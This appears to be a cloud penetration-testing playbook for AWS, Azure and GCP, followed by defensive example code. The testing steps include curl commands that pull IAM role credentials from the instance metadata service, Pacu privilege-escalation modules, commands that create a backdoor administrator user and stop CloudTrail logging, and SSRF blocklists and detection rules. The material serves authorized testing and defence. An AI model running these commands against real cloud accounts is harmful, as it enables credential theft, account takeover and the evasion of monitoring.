# Conducting Cloud Penetration Testing
## When to Use
- When performing authorized security assessments of cloud environments before production deployment
- When validating cloud security controls after a major architectural change or migration
- When compliance requirements mandate annual penetration testing of cloud infrastructure
- When testing incident response readiness by simulating realistic cloud-based attack scenarios
- When assessing lateral movement risk across multi-account or multi-cloud environments
Do not use for unauthorized testing against cloud accounts, for testing cloud provider infrastructure itself (covered by the shared responsibility model), or for DDoS simulation without explicit cloud provider approval.
## Prerequisites
- Written authorization from the cloud account owner and scope definition document
- AWS, Azure, or GCP penetration testing policy acknowledgment (AWS no longer requires pre-approval for most services)
- Isolated testing account, or an explicitly scoped production account with break-glass procedures
- Cloud-specific offensive tooling installed: Pacu (AWS), ScoutSuite, Prowler, CloudFox
- MITRE ATT&CK Cloud matrix for finding classification
## Workflow
### Step 1: Define Scope and Rules of Engagement
Establish testing boundaries based on the shared responsibility model. The customer is responsible for testing configurations, IAM policies, application security, and data protection. The cloud provider manages physical infrastructure, hypervisor, and managed service internals.
```text
Cloud Penetration Test Scope Document
=======================================
Target: AWS Account 123456789012 (Production)
Testing Window: 2025-02-24 08:00 UTC to 2025-02-28 18:00 UTC
Authorization: Signed by CISO, dated 2025-02-20

IN SCOPE:
- IAM users, roles, policies, and cross-account trust
- EC2 instances, security groups, and network ACLs
- S3 bucket policies and data access controls
- Lambda functions, API Gateway endpoints
- RDS/DynamoDB access controls and encryption
- EKS cluster RBAC and network policies
- CloudTrail, Config, and monitoring gaps

OUT OF SCOPE:
- AWS managed service internals (RDS engine, Lambda runtime)
- DDoS attacks or volumetric testing
- Physical infrastructure or hypervisor attacks
- Social engineering of AWS support

EMERGENCY CONTACT: security-ops@company.com, +1-555-0199
```

### Step 2: Reconnaissance and Cloud Enumeration
Use cloud-specific tools to enumerate the attack surface: exposed services, public IPs, S3 buckets, IAM configurations, and metadata endpoints.
```bash
# ScoutSuite multi-cloud assessment
scout suite aws --profile target-account --report-dir ./scout-report

# Prowler comprehensive AWS security assessment
prowler aws -M json-ocsf -o ./prowler-output --profile target-account

# CloudFox for identifying privilege escalation paths
cloudfox aws --profile target-account all-checks

# Enumerate public S3 buckets (get-bucket-policy-status fails for buckets without a policy,
# hence the stderr redirect)
for bucket in $(aws s3api list-buckets --query 'Buckets[*].Name' --output text); do
  aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | grep -q "true" && echo "PUBLIC: $bucket"
done

# Check for IMDS v1 (vulnerable to SSRF): HttpTokens "optional" means IMDSv1 is still
# reachable, "required" means IMDSv2 is enforced
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].[InstanceId,MetadataOptions.HttpTokens]' \
  --output table
```
### Step 3: IAM Privilege Escalation Testing
Use Pacu to identify and exploit IAM misconfigurations that allow privilege escalation from a low-privilege starting point to administrative access.
```bash
# Initialize Pacu session (the commands that follow are entered at the Pacu prompt)
pacu

# Set stolen or test credentials
set_keys --key-alias test-creds

# Run IAM enumeration modules
run iam__enum_users_roles_policies_groups
run iam__enum_permissions

# Check for privilege escalation paths
run iam__privesc_scan

# Common escalation paths to test:
# 1. iam:CreatePolicyVersion - Create new policy version with admin access
# 2. iam:AttachUserPolicy - Attach AdministratorAccess to self
# 3. iam:PassRole + lambda:CreateFunction - Create Lambda with admin role
# 4. iam:PassRole + ec2:RunInstances - Launch EC2 with admin instance profile
# 5. sts:AssumeRole - Cross-account role assumption without MFA condition
```
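Before or after running Pacu, it helps to know which of the escalation paths above a given policy set even makes possible. The script below is an added example, not Pacu's `iam__privesc_scan` module: it evaluates IAM policy documents (in the JSON shape the IAM API returns) for paths 1 to 4, honouring action wildcards and explicit Deny statements. The three policy sets are constructed samples; the account id is the in-scope account from the scope document. Path 5 concerns trust policies and is covered separately under Step 5.

```python
# Added example (not Pacu's iam__privesc_scan): flag the escalation-prone permission
# combinations listed above in a set of IAM policy documents. Policy documents are
# constructed samples in the shape returned by get-policy-version / get-role-policy.
from fnmatch import fnmatchcase

# Each entry: (path name as listed above, every action that must be allowed for it)
ESCALATION_PATHS = [
    ("iam:CreatePolicyVersion", {"iam:createpolicyversion"}),
    ("iam:AttachUserPolicy", {"iam:attachuserpolicy"}),
    ("iam:PassRole + lambda:CreateFunction", {"iam:passrole", "lambda:createfunction"}),
    ("iam:PassRole + ec2:RunInstances", {"iam:passrole", "ec2:runinstances"}),
]


def _as_list(value):
    """IAM accepts a scalar or a list for Statement/Action; normalize to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def collect_action_patterns(policy_docs):
    """Return (allow, deny) sets of lower-cased action patterns such as 'iam:*'.
    Simplification: Resource and Condition scoping are ignored, so a narrowly scoped Allow
    is still reported (for manual review) and a conditional Deny is not trusted to block."""
    allow, deny = set(), set()
    for doc in policy_docs:
        for stmt in _as_list(doc.get("Statement")):
            actions = {a.lower() for a in _as_list(stmt.get("Action"))}
            if stmt.get("Effect") == "Allow":
                allow |= actions
            elif stmt.get("Effect") == "Deny" and not stmt.get("Condition"):
                deny |= actions
    return allow, deny


def is_allowed(action, allow, deny):
    """IAM semantics: an explicit Deny wins over any Allow; '*' and '?' are wildcards."""
    if any(fnmatchcase(action, pattern) for pattern in deny):
        return False
    return any(fnmatchcase(action, pattern) for pattern in allow)


def find_escalation_paths(policy_docs):
    """Names of the escalation paths whose required actions are all effectively allowed."""
    allow, deny = collect_action_patterns(policy_docs)
    return [name for name, required in ESCALATION_PATHS
            if all(is_allowed(a, allow, deny) for a in required)]


# Constructed sample: a developer policy of the kind finding PT-001 describes
DEVELOPER_POLICIES = [{
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:Get*", "s3:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:CreatePolicyVersion",
         "Resource": "arn:aws:iam::123456789012:policy/DeveloperPolicy"},
        {"Effect": "Allow", "Action": ["iam:PassRole", "lambda:CreateFunction"], "Resource": "*"},
    ],
}]

# Constructed sample: the same policy after remediation; the permission boundary from
# PT-001's remediation is approximated here as an explicit Deny on iam:*
HARDENED_POLICIES = [{
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:Get*", "s3:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": ["lambda:CreateFunction"], "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:*", "Resource": "*"},
    ],
}]

# Constructed sample: service-level wildcards, common in "power user" style policies
WILDCARD_POLICIES = [{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": ["iam:*", "ec2:*"], "Resource": "*"}],
}]

if __name__ == "__main__":
    for label, docs in [("developer", DEVELOPER_POLICIES), ("hardened", HARDENED_POLICIES),
                        ("wildcard", WILDCARD_POLICIES)]:
        print(f"{label}: {find_escalation_paths(docs) or 'no escalation paths found'}")
```

Because Resource and Condition scoping are ignored, the output is a list of candidates to confirm by hand (or with Pacu), not a list of confirmed findings; a `PassRole` statement restricted to a non-privileged role, for example, is still reported.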
### Step 4: SSRF to Cloud Metadata Service Exploitation
Test web applications for Server-Side Request Forgery vulnerabilities that can reach the instance metadata service (IMDS) at 169.254.169.254 to steal IAM role credentials.
```bash
# Test for IMDS v1 access (no token required)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Test for IMDS v2 (requires token - more secure)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Azure IMDS equivalent (command not preserved on this page; Azure's IMDS also answers on
# 169.254.169.254 and requires the "Metadata: true" request header)

# GCP metadata service
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
```
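The application-side control that closes this path, alongside enforcing IMDSv2, is to validate outbound fetch destinations before the request is made (the "apply WAF rules for SSRF" remediation in finding PT-002 works at the edge; this check works in the application). The code below is an added example, not part of the page's methodology: it rejects link-local, loopback and private targets, including the IPv4-mapped IPv6 spelling of the IMDS address, blocks the GCP metadata hostname, and returns the resolved IP so the fetch layer can connect to it without a second lookup. Hostnames are resolved through an injectable resolver; `FAKE_DNS`, `fake_resolver` and the hostnames and addresses in it are constructed so the sample runs offline.

```python
# Added example (not from the page): SSRF destination validation for an outbound fetch.
import ipaddress
import socket
from urllib.parse import urlsplit

# Names that cloud metadata services answer on; IP literals are caught by the range checks
BLOCKED_HOSTNAMES = {"metadata.google.internal", "metadata", "localhost"}


def default_resolver(hostname):
    """All A/AAAA answers for hostname; every one is checked, not just the first."""
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def address_is_blocked(ip_text):
    """Reject link-local (169.254.0.0/16 covers IMDS), loopback, private and reserved ranges."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return True  # unparsable address: fail closed
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 must be judged as its IPv4 form
    return (ip.is_link_local or ip.is_loopback or ip.is_private
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def resolve_safe_target(url, resolver=default_resolver):
    """Return (host, ip) the caller should connect to, or raise ValueError.
    Handing back the resolved IP lets the fetch layer connect to that address instead of
    re-resolving, which closes the DNS-rebinding window between check and use."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    if host.lower() in BLOCKED_HOSTNAMES:
        raise ValueError(f"blocked hostname: {host}")
    try:
        addresses = {str(ipaddress.ip_address(host))}  # IP literal: no DNS needed
    except ValueError:
        addresses = resolver(host)
    if not addresses:
        raise ValueError(f"cannot resolve {host}")
    for address in addresses:
        if address_is_blocked(address):
            raise ValueError(f"{host} resolves to blocked address {address}")
    return host, sorted(addresses)[0]


def is_safe_target(url, resolver=default_resolver):
    """Boolean wrapper for callers that only need allow/deny."""
    try:
        resolve_safe_target(url, resolver)
        return True
    except ValueError:
        return False


# Constructed stand-in for DNS, including a name that also resolves to the IMDS address
FAKE_DNS = {
    "api.example.com": {"93.184.216.34"},
    "rebind.attacker.example": {"93.184.216.35", "169.254.169.254"},
}


def fake_resolver(hostname):
    return FAKE_DNS.get(hostname, set())


if __name__ == "__main__":
    for candidate in ["https://api.example.com/v1/items",
                      "http://169.254.169.254/latest/meta-data/",
                      "http://[::ffff:169.254.169.254]/latest/meta-data/",
                      "http://rebind.attacker.example/",
                      "file:///etc/passwd",
                      "http://metadata.google.internal/computeMetadata/v1/"]:
        verdict = "allow" if is_safe_target(candidate, fake_resolver) else "block"
        print(f"{verdict:5} {candidate}")
```

Note that `ipaddress.is_private` in the Python standard library also covers the documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), which is why the sample uses a non-documentation public address; a validator that must allow such ranges should enumerate the blocked networks explicitly instead.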
### Step 5: Lateral Movement and Data Access
Test cross-account role assumptions, VPC peering connections, and shared resource access to map lateral movement opportunities.
```bash
# Enumerate cross-account role trusts (roles whose trust policy names an AWS principal)
aws iam list-roles \
  --query 'Roles[?AssumeRolePolicyDocument.Statement[?Principal.AWS != `null`]].[RoleName,Arn]' \
  --output table

# Test cross-account assumption
aws sts assume-role \
  --role-arn arn:aws:iam::987654321098:role/CrossAccountRole \
  --role-session-name pentest-session

# Enumerate accessible S3 data with stolen credentials
aws s3 ls --recursive s3://target-bucket/ --summarize

# Check Lambda environment variables for secrets
aws lambda list-functions --query 'Functions[*].[FunctionName]' --output text | while read -r fn; do
  echo "== $fn"
  aws lambda get-function-configuration --function-name "$fn" \
    --query 'Environment.Variables' --output json 2>/dev/null
done
```
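The `list-roles` query above only says which roles name an AWS principal; deciding whether a trust is a lateral-movement finding means reading each statement for the trusted account and for an MFA condition (escalation path 5 in Step 3). The script below is an added example, not CloudFox or Pacu output: it walks role records in the shape `aws iam list-roles` returns and reports every statement that lets a principal outside the in-scope account (123456789012, from the scope document) assume the role. The roles are constructed samples; 987654321098 is the peer account used in the `assume-role` command above.

```python
# Added example (not CloudFox/Pacu): review trust policies for cross-account principals
# that can assume a role without MFA. Roles below are constructed samples.
import re

OWN_ACCOUNT = "123456789012"
# A bare account id or an IAM ARN; captures the 12-digit account id
ACCOUNT_RE = re.compile(r"^(?:arn:aws:iam::)?(\d{12})(?::.*)?$")


def _as_list(value):
    """IAM accepts a scalar or a list for Statement/Action/Principal.AWS."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def principal_accounts(principal):
    """Account ids (or '*') named under the AWS principal key; Service principals are ignored."""
    if principal == "*":
        return {"*"}
    if not isinstance(principal, dict):
        return set()
    accounts = set()
    for entry in _as_list(principal.get("AWS")):
        if entry == "*":
            accounts.add("*")
            continue
        match = ACCOUNT_RE.match(entry)
        if match:
            accounts.add(match.group(1))
    return accounts


def requires_mfa(stmt):
    """True if the statement carries aws:MultiFactorAuthPresent = true under any operator
    (Bool, BoolIfExists, ...); the value may be a JSON bool or the string "true"."""
    for operator_values in stmt.get("Condition", {}).values():
        for key, value in operator_values.items():
            if key.lower() == "aws:multifactorauthpresent" and str(value).lower() == "true":
                return True
    return False


def review_trust_policies(roles, own_account=OWN_ACCOUNT):
    """One finding per Allow statement that lets a principal outside own_account assume the role."""
    findings = []
    for role in roles:
        for stmt in _as_list(role["AssumeRolePolicyDocument"].get("Statement")):
            if stmt.get("Effect") != "Allow":
                continue
            actions = {a.lower() for a in _as_list(stmt.get("Action"))}
            if not actions & {"sts:assumerole", "sts:*", "*"}:
                continue
            external = principal_accounts(stmt.get("Principal", {})) - {own_account}
            if not external:
                continue
            issues = []
            if "*" in external:
                issues.append("wildcard principal")
            if not requires_mfa(stmt):
                issues.append("no MFA condition")
            findings.append({"role": role["RoleName"], "trusted": sorted(external), "issues": issues})
    return findings


# Constructed sample roles in the shape of `aws iam list-roles` output
SAMPLE_ROLES = [
    {"RoleName": "CrossAccountRole", "AssumeRolePolicyDocument": {"Statement": [
        {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::987654321098:root"},
         "Action": "sts:AssumeRole",
         "Condition": {"Bool": {"aws:MultiFactorAuthPresent": "true"}}}]}},
    {"RoleName": "VendorRole", "AssumeRolePolicyDocument": {"Statement": [
        {"Effect": "Allow", "Principal": {"AWS": "987654321098"}, "Action": "sts:AssumeRole"}]}},
    {"RoleName": "OpenRole", "AssumeRolePolicyDocument": {"Statement": [
        {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "sts:AssumeRole"}]}},
    {"RoleName": "LambdaExecRole", "AssumeRolePolicyDocument": {"Statement": [
        {"Effect": "Allow", "Principal": {"Service": "lambda.amazonaws.com"}, "Action": "sts:AssumeRole"}]}},
    {"RoleName": "DeployRole", "AssumeRolePolicyDocument": {"Statement": [
        {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:role/CI"}, "Action": "sts:AssumeRole"}]}},
]

if __name__ == "__main__":
    for finding in review_trust_policies(SAMPLE_ROLES):
        print(finding)
```

A cross-account trust with an MFA condition (CrossAccountRole) is still listed, with an empty issue list, because the tester needs the full map of who can reach the account; only the issue list decides whether it becomes a finding.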
### Step 6: Persistence and Detection Evasion Testing
Test whether the organization's monitoring detects persistence mechanisms such as new IAM users, access keys, Lambda backdoors, or CloudTrail disabling.
```bash
# Test: Create backdoor IAM user (authorized test only)
aws iam create-user --user-name pentest-backdoor
aws iam create-access-key --user-name pentest-backdoor
aws iam attach-user-policy --user-name pentest-backdoor \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Test: Disable CloudTrail (verify GuardDuty alerts)
aws cloudtrail stop-logging --name management-trail

# Test: Create Lambda for persistence (authorized test only)
# (command not preserved on this page)

# Verify: Did GuardDuty generate Stealth:IAMUser/CloudTrailLoggingDisabled?
# Verify: Did Security Hub alert on the new admin user?

# CLEANUP: Remove all persistence artifacts after testing
# (AKIAEXAMPLE is a placeholder: use the AccessKeyId returned by create-access-key above)
aws iam delete-access-key --user-name pentest-backdoor --access-key-id AKIAEXAMPLE
aws iam detach-user-policy --user-name pentest-backdoor \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam delete-user --user-name pentest-backdoor
aws cloudtrail start-logging --name management-trail
```
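The "Verify" lines above ask whether the organization's own monitoring caught each action; if GuardDuty or Security Hub stayed silent, the detection side needs rules of its own. The code below is an added example, not GuardDuty or Security Hub logic: three detection rules run over CloudTrail records, covering trail tampering (the condition behind `Stealth:IAMUser/CloudTrailLoggingDisabled`), an access key created for a principal other than the caller, and `AdministratorAccess` attached to a user, distinguishing users created earlier in the same record stream. The records, the `dev-alice` actor and the trail name are constructed to mirror the Step 6 commands; real records would come from the CloudTrail S3 delivery or a SIEM and carry many more fields.

```python
# Added example (not GuardDuty/Security Hub): CloudTrail detection rules for the
# persistence tests above. Records are constructed and trimmed to the fields the rules read.
ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"
# CloudTrail API calls that stop, remove or reconfigure a trail
TRAIL_TAMPERING = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"}


def _targets_self(actor_arn, user_name):
    """CreateAccessKey omits userName when a user creates a key for itself."""
    return user_name is None or actor_arn.endswith(f"/{user_name}")


def detect_persistence(events):
    """Return alerts, in event order, for the three persistence patterns tested above."""
    alerts = []
    new_users = set()
    for event in events:
        source = event.get("eventSource")
        name = event.get("eventName")
        params = event.get("requestParameters") or {}
        actor = event.get("userIdentity", {}).get("arn", "unknown")
        if source == "cloudtrail.amazonaws.com" and name in TRAIL_TAMPERING:
            # The condition GuardDuty reports as Stealth:IAMUser/CloudTrailLoggingDisabled
            alerts.append({"rule": "CloudTrailLoggingDisabled",
                           "detail": f"{name} on trail {params.get('name')} by {actor}"})
        elif source == "iam.amazonaws.com":
            user = params.get("userName")
            if name == "CreateUser":
                new_users.add(user)
            elif name == "CreateAccessKey" and not _targets_self(actor, user):
                alerts.append({"rule": "AccessKeyForOtherPrincipal",
                               "detail": f"{actor} created an access key for {user}"})
            elif name == "AttachUserPolicy" and params.get("policyArn") == ADMIN_POLICY_ARN:
                origin = "newly created user" if user in new_users else "existing user"
                alerts.append({"rule": "AdminPolicyAttached",
                               "detail": f"AdministratorAccess attached to {origin} {user} by {actor}"})
    return alerts


ACTOR = "arn:aws:iam::123456789012:user/dev-alice"  # constructed caller
# Constructed CloudTrail records mirroring the Step 6 commands, plus two benign events
SAMPLE_EVENTS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateUser",
     "userIdentity": {"arn": ACTOR}, "requestParameters": {"userName": "pentest-backdoor"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"arn": ACTOR}, "requestParameters": {"userName": "pentest-backdoor"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "userIdentity": {"arn": ACTOR},
     "requestParameters": {"userName": "pentest-backdoor", "policyArn": ADMIN_POLICY_ARN}},
    {"eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging",
     "userIdentity": {"arn": ACTOR}, "requestParameters": {"name": "management-trail"}},
    # Benign: a user rotating its own key (no userName parameter) and a read-only call
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"arn": ACTOR}, "requestParameters": None},
    {"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets",
     "userIdentity": {"arn": ACTOR}, "requestParameters": None},
]

if __name__ == "__main__":
    for alert in detect_persistence(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['detail']}")
```

Running the rules against the records CloudTrail emitted during the engagement window is also a quick way to confirm that the cleanup commands ran: `DeleteUser` and `StartLogging` should appear after the alerts, and nothing should alert after them.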
### Step 7: Report Findings with MITRE ATT&CK Mapping
Document all findings mapped to the MITRE ATT&CK Cloud matrix with severity, proof of concept, business impact, and remediation guidance.
## Key Concepts
| Term | Definition |
|---|---|
| Shared Responsibility Model | Cloud security framework where the provider secures infrastructure and the customer secures data, configurations, and access controls |
| IMDS | Instance Metadata Service at 169.254.169.254 that provides instance identity, credentials, and configuration data; IMDSv2 requires token-based access |
| Privilege Escalation | Exploiting IAM misconfigurations to elevate from limited permissions to administrative access within a cloud account |
| Lateral Movement | Using compromised credentials or trust relationships to access resources in other accounts, VPCs, or cloud providers |
| Pacu | Open-source AWS exploitation framework for penetration testing, providing modules for enumeration, escalation, and persistence |
| ScoutSuite | Multi-cloud security auditing tool that collects configuration data and generates HTML reports with risk findings |
| MITRE ATT&CK Cloud | Adversary tactics and techniques matrix specific to cloud environments including Initial Access, Execution, Persistence, and Exfiltration |
## Tools & Systems
- Pacu: AWS-focused exploitation framework with modules for IAM enumeration, privilege escalation, and persistence testing
- ScoutSuite: Multi-cloud (AWS, Azure, GCP) security auditing tool generating comprehensive risk reports from API data collection
- CloudFox: AWS and Azure enumeration tool for identifying attack paths, privilege escalation vectors, and data access opportunities
- Prowler: Open-source cloud security assessment tool with 300+ checks across AWS, Azure, and GCP
- Cartography: Neo4j-based tool that maps relationships between cloud resources for visual attack path analysis
## Common Scenarios
### Scenario: SSRF in Web Application Leads to Full Account Compromise
Context: A penetration tester discovers an SSRF vulnerability in a web application hosted on an EC2 instance running IMDSv1. The instance has an IAM role with broad S3 and Lambda permissions.
Approach:
- Exploit the SSRF to reach http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
- Extract temporary IAM credentials (AccessKeyId, SecretAccessKey, SessionToken)
- Use the credentials to enumerate accessible S3 buckets and download sensitive data
- Check if the role has iam:PassRole + lambda:CreateFunction for privilege escalation to admin
- Document the full attack chain from SSRF to account-level compromise
- Recommend: enforce IMDSv2, reduce IAM role scope, add VPC endpoint policies blocking IMDS from application tier
Pitfalls: Not testing IMDSv2 enforcement separately from IMDSv1 gives incomplete results. Failing to clean up test artifacts (backdoor users, Lambda functions) leaves real vulnerabilities after the engagement.
## Output Format
```text
Cloud Penetration Test Report
===============================
Target: AWS Account 123456789012 (Production)
Testing Period: 2025-02-24 to 2025-02-28
Methodology: MITRE ATT&CK Cloud + OWASP Cloud Testing Guide
Tester: Security Team - Authorized Engagement

EXECUTIVE SUMMARY:
Starting with read-only developer credentials, the assessment achieved
full administrative access to the production account within 3 hours through
an IAM privilege escalation chain. 47 findings identified across 7 ATT&CK tactics.

CRITICAL FINDINGS:

[PT-001] IAM Privilege Escalation via iam:CreatePolicyVersion
ATT&CK: T1098.001 (Account Manipulation: Additional Cloud Credentials)
Severity: CRITICAL
Starting Point: Developer role with iam:CreatePolicyVersion permission
Impact: Full administrative access to all account resources
Evidence: Created policy version granting iam:* and s3:* to test role
Remediation: Remove iam:CreatePolicyVersion from developer roles, add permission boundary

[PT-002] SSRF to IMDS Credential Theft
ATT&CK: T1552.005 (Unsecured Credentials: Cloud Instance Metadata API)
Severity: CRITICAL
Starting Point: Web application URL parameter vulnerable to SSRF
Impact: Extracted IAM role credentials with S3 and Lambda access
Remediation: Enforce IMDSv2, apply WAF rules for SSRF, restrict IAM role scope

FINDING SUMMARY BY MITRE ATT&CK TACTIC:
Initial Access: 4 findings
Execution: 3 findings
Persistence: 6 findings
Privilege Escalation: 8 findings (3 Critical)
Defense Evasion: 5 findings
Credential Access: 7 findings
Discovery: 14 findings
Total: 47 findings
```